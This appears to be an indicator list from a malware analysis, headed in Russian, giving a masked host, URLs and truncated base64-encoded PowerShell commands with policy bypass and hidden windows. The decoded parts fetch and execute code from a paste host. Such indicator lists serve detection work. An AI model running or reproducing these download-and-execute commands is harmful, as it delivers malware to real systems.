Техническая информация
- http://pa###.c-net.org/staceconcerns
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -e cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAIABhAFEAQgBsAEEASABnAEEASwBBAEIAdQBBAEcAVQBBAGQAdwBBAHQAQQB...
- 'pa###.c-net.org':80
- http://pa###.c-net.org/StaceConcerns
- DNS ASK pa###.c-net.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ep bypass -e cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAIABhAFEAQgBsAEEASABnAEEASwBBAEIAdQBBAEcAVQBBAGQAdwBBAHQAQQB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' powershell -e aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHAAYQBzAHQAZQAuAGMALQBuAGUAdAAuAG8AcgB...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHAAYQBzAHQAZQAuAGMALQBuAGUAdAAuAG8AcgBnAC8AUwB0AG...